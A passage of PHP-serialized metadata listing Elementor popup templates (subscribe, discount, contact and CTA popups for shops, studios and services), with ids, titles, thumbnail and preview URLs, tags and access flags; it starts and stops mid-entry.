Stylist\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/hair-stylist-20.jpg\";s:12:\"tmpl_created\";i:1647354614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-discount-hair-stylist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Barbershop\",\"Discount\",\"Hair\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:2;a:19:{s:4:\"tmpl\";i:1285;s:2:\"id\";i:22440;s:5:\"title\";s:32:\"Classic | Subscribe | Shoe Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/shoes-store-21.jpg\";s:12:\"tmpl_created\";i:1647418620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-subscribe-shoe-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:37:\"[\"Ecommerce\",\"Marketing\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:3;a:19:{s:4:\"tmpl\";i:1286;s:2:\"id\";i:22446;s:5:\"title\";s:37:\"Full Screen | Subscribe | Denim Store\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/denim-store-22.jpg\";s:12:\"tmpl_created\";i:1647419614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/full-screen-subscribe-denim-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:4;a:19:{s:4:\"tmpl\";i:1287;s:2:\"id\";i:22452;s:5:\"title\";s:37:\"Fly-In | Subscribe | Pizza Restaurant\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/pizza-restaurant-23.jpg\";s:12:\"tmpl_created\";i:1647420733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-subscribe-pizza-restaurant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:19:\"[\"Business\",\"Food\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:5;a:19:{s:4:\"tmpl\";i:1288;s:2:\"id\";i:22458;s:5:\"title\";s:38:\"Full Screen | Subscribe | Fashion Shop\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-shop-24.jpg\";s:12:\"tmpl_created\";i:1647426379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-subscribe-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Ecommerce\",\"Fashion\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:6;a:19:{s:4:\"tmpl\";i:1289;s:2:\"id\";i:22464;s:5:\"title\";s:32:\"Fly-In | Contact | Makeup Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/makeup-studio-25.jpg\";s:12:\"tmpl_created\";i:1647427026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-makeup-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:7;a:19:{s:4:\"tmpl\";i:1290;s:2:\"id\";i:22470;s:5:\"title\";s:32:\"Fly-In | Contact | Design Studio\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/design-studio-26.jpg\";s:12:\"tmpl_created\";i:1647428250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-contact-design-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Business\",\"Contact\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:8;a:19:{s:4:\"tmpl\";i:1291;s:2:\"id\";i:22480;s:5:\"title\";s:27:\"Classic | CTA | MasterClass\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/master-class-27.jpg\";s:12:\"tmpl_created\";i:1647428474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-masterclass/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"cta\",\"Magazine\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:9;a:19:{s:4:\"tmpl\";i:1292;s:2:\"id\";i:22489;s:5:\"title\";s:29:\"Classic | CTA | Music Concert\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/03/music-concert-29.jpg\";s:12:\"tmpl_created\";i:1647429738;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-music-concert/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"cta\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:10;a:19:{s:4:\"tmpl\";i:1293;s:2:\"id\";i:22495;s:5:\"title\";s:27:\"Classic | CTA | Music Album\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/music-album-30.jpg\";s:12:\"tmpl_created\";i:1647430056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/popups/classic-cta-music-album/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Ba\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:11;a:19:{s:4:\"tmpl\";i:1294;s:2:\"id\";i:22501;s:5:\"title\";s:37:\"Fly-In | CTA | Photography Exhibition\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/photography-exhibition-31.jpg\";s:12:\"tmpl_created\";i:1647430512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-photography-exhibition/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:33:\"[\"cta\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:12;a:19:{s:4:\"tmpl\";i:1295;s:2:\"id\";i:22507;s:5:\"title\";s:34:\"Classic | CTA | Clothing Shop Sale\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/clothing-shop-sale-32.jpg\";s:12:\"tmpl_created\";i:1647430774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/popups/classic-cta-clothing-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:35:\"[\"Ecommerce\",\"Fashion\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:13;a:19:{s:4:\"tmpl\";i:1296;s:2:\"id\";i:22486;s:5:\"title\";s:30:\"Classic | CTA | Shop Promotion\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/shop-promotion-28.jpg\";s:12:\"tmpl_created\";i:1647430951;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-shop-promotion/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"cta\",\"Magazine\",\"Photography\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:14;a:19:{s:4:\"tmpl\";i:1297;s:2:\"id\";i:22516;s:5:\"title\";s:32:\"Fly-In | CTA | Glasses Shop Sale\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/glasses-shop-sale-33.jpg\";s:12:\"tmpl_created\";i:1647431136;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-cta-glasses-shop-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:30:\"[\"Business\",\"cta\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:15;a:19:{s:4:\"tmpl\";i:1298;s:2:\"id\";i:22522;s:5:\"title\";s:30:\"Fly-In | Discount | Skate Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/50-skate-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647434058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/fly-in-discount-skate-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:16;a:19:{s:4:\"tmpl\";i:1299;s:2:\"id\";i:22532;s:5:\"title\";s:43:\"Classic | Subscription | Basketball Academy\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/21-basketball-academy-Subscription.jpg\";s:12:\"tmpl_created\";i:1647434608;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/popups/classic-subscription-basketball-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Education\",\"Marketing\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:17;a:19:{s:4:\"tmpl\";i:1300;s:2:\"id\";i:22543;s:5:\"title\";s:38:\"Classic | Discount | Veterinary Clinic\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/veterinery-clinic-small.jpg\";s:12:\"tmpl_created\";i:1647435581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/classic-discount-veterinary-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Discount\",\"Pets\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:18;a:19:{s:4:\"tmpl\";i:1301;s:2:\"id\";i:22553;s:5:\"title\";s:39:\"Classic | Contact | Business Consulting\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/27-business-consulting-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647439935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/classic-contact-business-consulting/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Business\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:19;a:19:{s:4:\"tmpl\";i:1302;s:2:\"id\";i:22562;s:5:\"title\";s:28:\"Classic | Contact | Handyman\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/handyman-small.jpg\";s:12:\"tmpl_created\";i:1647440333;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-contact-handyman/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Business\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:20;a:19:{s:4:\"tmpl\";i:1303;s:2:\"id\";i:22573;s:5:\"title\";s:40:\"Classic | Discount | Online Fashion Shop\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/31-online-fashion-shop-Discount.jpg\";s:12:\"tmpl_created\";i:1647462549;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-online-fashion-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Discount\",\"Ecommerce\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:21;a:19:{s:4:\"tmpl\";i:1304;s:2:\"id\";i:22583;s:5:\"title\";s:36:\"Fly-In | Discount | Personal Trainer\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/personal-trainer-small.jpg\";s:12:\"tmpl_created\";i:1647503781;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-personal-trainer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:22;a:19:{s:4:\"tmpl\";i:1305;s:2:\"id\";i:22592;s:5:\"title\";s:41:\"Classic | Contact | Illustrator Portfolio\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/illustrator-protfolio-small.jpg\";s:12:\"tmpl_created\";i:1647504218;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-contact-illustrator-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:49:\"[\"Contact\",\"Creative Portfolio\",\"Digital Agency\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:23;a:19:{s:4:\"tmpl\";i:1306;s:2:\"id\";i:22602;s:5:\"title\";s:46:\"Bottom Bar | Discount | Handmade Ceramics Shop\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2022/03/handmade-ceramic-shop-36-small.jpg\";s:12:\"tmpl_created\";i:1647507007;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-ceramics-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:48:\"[\"Business\",\"cta\",\"Ecommerce\",\"Interior Design\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:24;a:19:{s:4:\"tmpl\";i:1307;s:2:\"id\";i:22612;s:5:\"title\";s:51:\"Classic | Contact | Classic Car Restoration Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/restoration-car-shop-37-small.jpg\";s:12:\"tmpl_created\";i:1647507310;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:153:\"https://library.elementor.com/popups/classic-contact-classic-car-restoration-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Booking\",\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:25;a:19:{s:4:\"tmpl\";i:1308;s:2:\"id\";i:22621;s:5:\"title\";s:30:\"Classic | Booking | Life Coach\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/38-life-coach-Booking.jpg\";s:12:\"tmpl_created\";i:1647508596;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-booking-life-coach/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:33:\"[\"Booking\",\"Business\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:26;a:19:{s:4:\"tmpl\";i:1309;s:2:\"id\";i:22632;s:5:\"title\";s:42:\"Classic |  Subscription | Merchandise Shop\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/Merchandise-Shop-39-small.jpg\";s:12:\"tmpl_created\";i:1647509196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-subscription-merchandise-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Ecommerce\",\"Marketing\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:27;a:19:{s:4:\"tmpl\";i:1310;s:2:\"id\";i:22643;s:5:\"title\";s:48:\"Fly-In | Contact | Non-Governmental Organization\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/NGO-41-small.jpg\";s:12:\"tmpl_created\";i:1647509528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:150:\"https://library.elementor.com/popups/fly-in-contact-non-governmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:28;a:19:{s:4:\"tmpl\";i:1311;s:2:\"id\";i:22654;s:5:\"title\";s:35:\"Hello Bar | Contact | Family Doctor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/family-doctor-44-small.jpg\";s:12:\"tmpl_created\";i:1647509732;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/hello-bar-contact-family-doctor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Contact\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:29;a:19:{s:4:\"tmpl\";i:1312;s:2:\"id\";i:22663;s:5:\"title\";s:36:\"Classic | Subscription | Sports Blog\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/45-sport-blog-Subscription.jpg\";s:12:\"tmpl_created\";i:1647509908;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-sports-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:30;a:19:{s:4:\"tmpl\";i:1313;s:2:\"id\";i:22673;s:5:\"title\";s:30:\"Hello Bar | Booking | Event 